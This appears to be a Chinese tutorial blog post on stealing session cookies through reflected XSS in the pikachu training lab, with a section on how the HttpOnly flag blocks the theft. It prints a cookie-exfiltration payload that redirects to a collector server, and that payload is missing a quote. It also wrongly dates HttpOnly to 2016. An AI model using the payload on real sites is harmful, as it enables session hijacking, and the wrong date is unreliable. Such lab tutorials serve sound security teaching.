XSS漏洞利用之cookie获取
目录
环境搭建
盗取cookie
httponly
刚学习xss的时候我们都知道只要能弹窗就肯定存在xss漏洞,也知道xss是可以盗取cookie的,但是至于怎么盗取cookie其实很多同学可能还不是很清楚,也可能并没有实质性的去探讨过这个问题。
环境搭建
- 存在漏洞的网站:pikachu靶场
- 接收cookie的网站:pikachu靶场中的管理工具xss后台
可以在两个服务器上同时开启pikachu靶场,一个测试漏洞,一个接收cookie
1. 修改pikachu-master\pkxss\xcookie\cookie.php文件
设置获取cookie后重定向的网站地址,这里就直接跳转到pikachu靶场的
2. 登录管理工具xss后台
盗取cookie
1. 测试是否能获取到cookie
如下我们可以知道当前页面是存在cookie的,通过document.cookie成功获取到了
2. 盗取cookie
因为页面存在xss漏洞,可以进行弹窗操作,既然能弹窗说明能执行js语句,那么在特定条件我们通过执行js语句可以获取cookie值。
受害者在未退出登录的情况下不小心点击了恶意链接,如下
192.168.189.129/2_Shotting_Range/pikachu-master/vul/xss/xss_reflected_get.php?message=<script>document.location = http://192.168.189.128/2_Shotting_Range/pikachu-master/pkxss/xcookie/cookie.php?cookie=' + document.cookie;</script>&submit=submit
红色字体就是存在xss漏洞的位置,我们在这里放入获取cookie的payload。payload意思就是访问189.128页面并且携带cookie将cookie存储到指定页面中
然后点击访问,页面进行了跳转,跳转到hacker的服务器上
2. 查看是否获取到cookie
如下成功获取到信息
httponly
HttpOnly是2016年微软为IE6而新增了这一属性,HttpOnly是包含在http返回头Set-Cookie里面的一个附加的flag,所以它是后端服务器对cookie设置的一个附加的属性,在生成cookie时使用HttpOnly标志有助于减轻客户端脚本访问受保护cookie的风险。
也就是说HttpOnly存在主要是为了防止用户通过前端js来盗用cookie而产生的风险,例如XSS攻击就是对cookie进行盗窃,使用这一属性就可以防止通过js脚本读取到cookie信息,预防XSS攻击,窃取cookie内容
如下,在set-cookie没有设置httponly的情况下,通过document.cookie是可以获取到cookie值的
然后设置httponly
正确登录后,返回含有httponly的cookie值
然后再通过document.cookie,此时则获取不到cookie值了
XSS漏洞利用之cookie获取相关推荐
- xss漏洞利用方式总结
目录 搭建XSS平台 窃取cookie 抓取屏幕截图 重定向 植入广告 恶意链接 获取键盘记录 网页钓鱼 网页挂马 搭建XSS平台 首先,我们需要一个XSS平台,自己搭建一个还是使用在线的都可以,本人 ...
- 【XSS漏洞-06】XSS漏洞利用案例(浏览器劫持、会话劫持、GetShell)—基于神器beEF
目录 1 案例简介 1.1 案例目的 1.2 案例环境 2 案例一:浏览器劫持 2.1 概述 2.2 案例步骤 3 案例二:会话劫持 3.1 概述 3.2 案例步骤 4 案例三:GetShell 4. ...
- 【XSS漏洞07】基于神器beEF的XSS漏洞利用实验(浏览器劫持、会话劫持、GetShell)
目录 1 实验简介 1.1 实验目的 1.2 实验环境 2 实验一:浏览器劫持 2.1 概述 2.2 实验步骤 3 实验二:会话劫持 3.1 概述 3.2 实验步骤 4 实验三:GetShell 4. ...
- XSS漏洞利用---PHPMyWind 任意密码重置漏洞
[漏洞详情] 1.PHPMyWind是一套基于PHP和MySQL并符合W3C标准的企业网站建设解决方案,拥有着较大的用户群体(根据PHPMyWind官网介绍,已下载超15万次),受影响的版本是5.3- ...
- XSS漏洞利用——键盘记录
实验环境:DVWA 实验原理:网页被植入xss脚本,普通用户访问此网页时,该用户在当前页面上所有的键盘按键都会被记录下来,并且发送到远端服务器 实验步骤: 一.在服务器创建一个keylog.php文件 ...
- Dreammail V4.6.9.2 XSS漏洞利用
转载请注明:@小五义http://www.cnblogs.com/xiaowuyi 针对版本: DreamMail 4.6.9.2 测试环境:windows xp sp3 python版本:2.6 测 ...
- 搭建HTTPS XSS漏洞利用平台
目录 功能: 升级方式:
- web漏洞利用---XSS注入攻击
XSS漏洞简介 XSS注入漏洞又称为"跨站脚本攻击(Cross Site Scripting)",为了不和层叠样式表(Cascading Style Sheets,CSS)混淆,所 ...
- CORS漏洞利用检测和利用方式
CORS全称Cross-Origin Resource Sharing, 跨域资源共享,是HTML5的一个新特性,已被所有浏览器支持,不同于古老的jsonp只能get请求. 检测方式: 1.curl访 ...
最新文章
- 小龙虾上天了!口碑APP推出飞机上扫码点餐服务
- 【论文解读】CVPR 2021 当之无愧的最佳论文奖:GIRAFFE,一种可控图像合成方法...
- linux shell的单行多行注释
- android项目编译命令行,命令行编译Android项目
- javascript面向对象5
- windows桌面待办事项_想拒绝拖延症?你还缺一款云同步提醒的的桌面便签软件!...
- linux 已有目录挂载磁盘
- 六下计算机教学总结,六年级信息技术教师教学工作总结
- ZIGBEE协议栈如何低功耗(CC2530+ZIGBEE2.5)
- 为什么有些蓝牙耳机有底噪?高音质便宜实惠的蓝牙耳机分享
- 台式计算机硬盘的安装位置,台式电脑分别如何安装SSD(固态硬盘)详细图文教程...
- 全栈式python工程师培训课程
- Linux系统下制作windows系统安装U盘
- IDEA的快捷键与qq的冲突了怎么办
- Linux--用xmanager远程管理的设定过程
- 不安全!!!都2020年了,你的网站还没上HTPPS说得过去吗?
- SkeyePlayer源码解析系列之支持H265
- C1实训-动态令牌(二次验证码)原理及实现
- MySQL廖雪峰的官方网站
- 免费顺丰快递鸟单号查询不限次数api接口申请步骤